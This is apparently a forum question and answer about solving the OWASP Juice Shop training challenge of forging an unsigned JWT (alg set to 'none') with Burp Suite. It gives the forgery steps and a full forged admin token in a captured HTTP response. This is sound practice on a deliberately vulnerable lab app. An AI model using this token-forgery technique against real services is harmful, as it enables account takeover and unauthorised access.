# juiceshop heroku forge unsigned token challenge not solved

Tags: node.js, jwt, owasp

I recently deployed Juiceshop on Heroku and am trying to solve the challenge of forging an unsigned JWT token using Burpsuite. I followed the hints provided in the ebook starting from using burpsuite to get a valid JWT token from the request header using the proxy tab on the /rest/user/whoami URL and sent it to the repeater. In the repeater tab, I changed the alg property in the token to "none" and the email to "jwtn3d@juice-sh.op". I then encoded them in base64 and put a period after the header and payload respectively in the token value. When I send the request, I get a HTTP 200 OK status and the jwtn3d@juice-sh.op email is reflected as well, but the juiceshop challenge doesn't seem to be solved. When I reload the website, I'm not logged in as jwtn3d@juice-sh.op either.

```
Server: Cowboy
Connection: close
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Feature-Policy: payment 'self'
Set-Cookie: token=ewogICJ0eXAiOiAiSldUIiwKICAiYWxnIjogIm5vbmUiCn0.ewogICJzdGF0dXMiOiAic3VjY2VzcyIsCiAgImRhdGEiOiB7CiAgICAiaWQiOiAxLAogICAgInVzZXJuYW1lIjogIiIsCiAgICAiZW1haWwiOiAiand0bjNkQGp1aWNlLXNoLm9wIiwKICAgICJwYXNzd29yZCI6ICIwMTkyMDIzYTdiYmQ3MzI1MDUxNmYwNjlkZjE4YjUwMCIsCiAgICAicm9sZSI6ICJhZG1pbiIsCiAgICAiZGVsdXhlVG9rZW4iOiAiIiwKICAgICJsYXN0TG9naW5JcCI6ICIwLjAuMC4wIiwKICAgICJwcm9maWxlSW1hZ2UiOiAiYXNzZXRzL3B1YmxpYy9pbWFnZXMvdXBsb2Fkcy9kZWZhdWx0QWRtaW4ucG5nIiwKICAgICJ0b3RwU2VjcmV0IjogIiIsCiAgICAiaXNBY3RpdmUiOiB0cnVlLAogICAgImNyZWF0ZWRBdCI6ICIyMDIyLTAyLTA2IDExOjUyOjAxLjQwOSArMDA6MDAiLAogICAgInVwZGF0ZWRBdCI6ICIyMDIyLTAyLTA2IDExOjUyOjAxLjQwOSArMDA6MDAiLAogICAgImRlbGV0ZWRBdCI6IG51bGwKICB9LAogICJpYXQiOiAxNjQ0MTQ4NDcxLAogICJleHAiOiAxNjQ0MTY2NDcxCn0.; Path=/
Content-Type: application/json; charset=utf-8
Content-Length: 133
Etag: W/"85-PWOL8M3mYJv9caLvST18mm7K+2g"
Vary: Accept-Encoding
Date: Sun, 06 Feb 2022 11:57:25 GMT
Via: 1.1 vegur

{"user":{"id":1,"email":"jwtn3d@juice-sh.op","lastLoginIp":"0.0.0.0","profileImage":"assets/public/images/uploads/defaultAdmin.png"}}
```

I tried opening DevTools on the website and manually changing the cookie value to the forged token, and when I reloaded the website it reflected the jwtn3d@juice-sh.op email on the profile. But it still didn't solve the challenge. I've looked for tutorials everywhere and the challenges all seem to have just been solved once they sent the forged token over using the repeater, I'm at a loss as to why it isn't working in my case.

Answer (score 0):

I found an alternative to using repeater, I used proxy intercept instead and changed the token value to the forged token on the /rest/user/whoami requests. That seemed to do the trick, though the notif pop up for the solved challenge didn't appear but it did show as solved in the scoreboard.